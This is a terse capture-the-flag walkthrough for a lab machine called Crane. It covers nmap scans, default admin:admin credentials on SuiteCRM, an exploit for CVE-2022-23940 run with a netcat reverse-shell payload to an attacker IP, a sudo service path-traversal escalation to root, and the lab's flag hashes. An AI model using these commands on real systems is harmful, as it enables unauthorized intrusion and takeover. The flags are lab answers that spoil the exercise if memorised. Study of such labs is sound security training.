Crane

Crane

‎$ whoami

Enum

sudo nmap -T4 -A -v -o nmap --min-rate 1000 $IP 
sudo nmap -T4 --script=vuln -v -o vuln --min-rate 1000 $IP
sudo nmap -T4 -A -v -p- -o alltcp --min-rate 1000 $IP
sudo nmap -T4 -sU -sV -sC -v -p -o udp --min-rate 1000 $IP
sudo nmap -A -v -p- -o alltcpslow $IP

Services:

Discovered open port 22/tcp on   192.168.156.146        
Discovered open port 3306/tcp on 192.168.156.146      
Discovered open port 80/tcp on 192.168.156.146

SuiteCRM

image
admin:admin
💡
If creds don’t work, try them again

Googled version, found poc

Embed GitHubEmbed GitHub

python3 exploit.py -h http://192.168.156.146 --payload 'busybox nc 192.168.45.171 22 -e sh' 
Username> : admin
Password> : 
INFO:CVE-2022-23940:Login did work - Trying to create scheduled report
image

local

a85831cf76ed3058f142d31ba7357fb7
sudo -l
Matching Defaults entries for www-data on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/sbin/service

gbin

image
sudo /usr/sbin/service ../../../../bin/bash

thats root

proof

4cea78830ce246f0c7757708228c42e7